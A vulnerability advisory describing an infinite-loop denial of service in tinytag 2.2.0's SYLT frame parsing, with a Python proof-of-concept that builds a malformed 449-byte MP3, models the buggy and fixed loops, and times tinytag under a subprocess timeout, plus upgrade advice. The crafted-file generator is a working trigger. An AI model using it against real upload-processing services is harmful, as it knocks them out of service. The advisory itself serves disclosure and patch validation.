tinytag Denial-of-Service Vulnerability via Non-Terminating SYLT Frame Parsing Loop
Vulnerability
A denial-of-service vulnerability has been identified in the tinytag Python library, version 2.2.0. It is triggered when the library parses an MP3 file whose ID3v2 tag contains a SYLT (synchronized lyrics) frame. An attacker can craft an MP3 file that, when processed by tinytag, sends the SYLT parsing function into an infinite loop that runs until the affected process or worker is terminated. The root cause is an incorrect assumption in the parsing logic: when the SYLT frame content lacks a string terminator, the function that locates the end of the string reports a position that resets the parsing offset instead of advancing it, so the loop never reaches the end of the frame. Server-side applications that automatically process user-uploaded files can be affected by a single MP3 file of 498 bytes, which freezes the parsing operation and disrupts normal workflow.
Impact
Exploitation of this vulnerability causes the tinytag library to enter a non-terminating loop while parsing, which is a direct loss of availability. In server-side environments it ties up the worker or process responsible for metadata extraction, causing delays or interruptions in service. In local or desktop applications, opening a malicious MP3 file hangs the program until the task is interrupted manually.
Reproduction
The vulnerability can be reproduced by supplying an MP3 file whose ID3v2 tag contains a crafted SYLT frame without a null terminator. A Python script can write such a file and then parse it with tinytag; running the parse under a timeout confirms that it does not complete within a reasonable time, which indicates that it is stuck in the infinite loop.
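The script below is an added example written for this page; it is neither tinytag's own code nor the original 498-byte proof of concept. It builds an MP3 whose ID3v2.4 tag holds a single SYLT frame with no string terminator, parses the tag back to show the frame layout, runs a simplified model of the entry loop in a 2.2.0-style (missing terminator resets the offset, as described above) and a 2.2.1-style (missing terminator ends the string at the end of the frame) variant, and, when tinytag is installed, times tinytag parsing the file in a throwaway child process. The model's function names, the constructed frame contents and the padding after the tag are assumptions of this example; only TinyTag.get is tinytag's real entry point.

```python
# Added example (not tinytag's code, and not the original 498-byte PoC):
# builds an MP3 whose ID3v2.4 tag holds a SYLT frame with no string
# terminator, models the loop behaviour the advisory describes, and
# optionally times tinytag parsing the file in a throwaway subprocess.
import os
import struct
import subprocess
import sys
import tempfile


def syncsafe(n: int) -> bytes:
    """Encode n as the 4-byte syncsafe integer ID3v2 uses for sizes."""
    return bytes(((n >> shift) & 0x7F) for shift in (21, 14, 7, 0))


def unsyncsafe(raw: bytes) -> int:
    """Decode a syncsafe integer (7 data bits per byte)."""
    value = 0
    for byte in raw:
        value = (value << 7) | (byte & 0x7F)
    return value


def build_sylt_mp3(terminated: bool = False) -> bytes:
    """Return a constructed MP3 whose only ID3 frame is SYLT. With
    terminated=False the content descriptor never gets its 0x00 terminator,
    which is the malformed shape described in the advisory."""
    descriptor = b"lyrics"
    if terminated:
        # well-formed variant: descriptor\0, then one lyric line\0 + timestamp
        descriptor += b"\x00" + b"line one\x00" + struct.pack(">I", 0)
    body = (b"\x00"        # text encoding: ISO-8859-1
            + b"eng"       # language
            + b"\x02"      # timestamp format: milliseconds
            + b"\x01"      # content type: lyrics
            + descriptor)
    frame = b"SYLT" + syncsafe(len(body)) + b"\x00\x00" + body
    tag = b"ID3\x04\x00\x00" + syncsafe(len(frame)) + frame
    # Constructed MPEG-1 Layer III frame header (128 kbps, 44.1 kHz) plus zero
    # padding so the bytes after the tag look like audio; there is no sound.
    return tag + b"\xff\xfb\x90\x00" + b"\x00" * 413


def first_frame(mp3: bytes) -> tuple:
    """Return (frame id, frame body) of the first frame in an ID3v2.4 tag."""
    if mp3[:3] != b"ID3":
        raise ValueError("no ID3v2 tag")
    size = unsyncsafe(mp3[14:18])          # frame header: id(4) size(4) flags(2)
    return mp3[10:14], mp3[20:20 + size]


def _string_end(content: bytes, offset: int, fixed: bool) -> int:
    """Index of the 0x00 terminating the string that starts at offset.
    Buggy model: bytes.find() yields -1 when there is none and that -1 is
    handed back, so the caller's offset arithmetic wraps to the start of
    the frame. Fixed model: the rest of the content is the final string."""
    end = content.find(b"\x00", offset)
    if end == -1 and fixed:
        return len(content)
    return end


def parse_sylt_model(content: bytes, fixed: bool, max_iter: int = 1000):
    """Simplified model of a SYLT entry loop (not tinytag's code).
    Returns (descriptor, entries, looped); looped is True when the loop hit
    max_iter, i.e. it would have run forever without the cap."""
    offset = 6                                  # skip the six fixed header bytes
    end = _string_end(content, offset, fixed)
    descriptor = content[offset:end]
    offset = end + 1                            # past the terminator
    entries = []
    for _ in range(max_iter):
        if offset >= len(content):
            return descriptor, entries, False
        end = _string_end(content, offset, fixed)
        entries.append(content[offset:end])
        offset = end + 1 + 4                    # text, terminator, 4-byte timestamp
    return descriptor, entries, True


def tinytag_hangs(path: str, timeout: float = 5.0):
    """Parse path with tinytag in a child process. Returns True if the child
    did not finish within timeout (it is killed), False if it finished, and
    None if tinytag is not installed. Helper is part of this example; only
    TinyTag.get is tinytag's real API."""
    try:
        import tinytag  # noqa: F401
    except ImportError:
        return None
    cmd = [sys.executable, "-c",
           "import sys; from tinytag import TinyTag; TinyTag.get(sys.argv[1])",
           path]
    try:
        subprocess.run(cmd, timeout=timeout, check=False,
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    except subprocess.TimeoutExpired:
        return True
    return False


if __name__ == "__main__":
    path = os.path.join(tempfile.mkdtemp(), "sylt_poc.mp3")
    with open(path, "wb") as fh:
        fh.write(build_sylt_mp3())
    body = first_frame(build_sylt_mp3())[1]
    print("2.2.0-style model loops forever:", parse_sylt_model(body, fixed=False)[2])
    print("2.2.1-style model result:", parse_sylt_model(body, fixed=True))
    print("tinytag hung on", path, "->", tinytag_hangs(path))
```

The child-process check matters: a hung parse cannot be interrupted from a thread, so a timeout-and-kill around a separate interpreter is the only way to run this repeatedly without leaving a spinning worker behind. The constructed file is 449 bytes, not the 498 of the original report, and a well-formed SYLT frame (terminated=True) parses identically under both model variants, which is the property to check when validating the upgrade.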
Remediation
Upgrade to tinytag version 2.2.1, which fixes the issue by making the string end position function handle content without a terminator, so the SYLT frame parsing loop terminates.
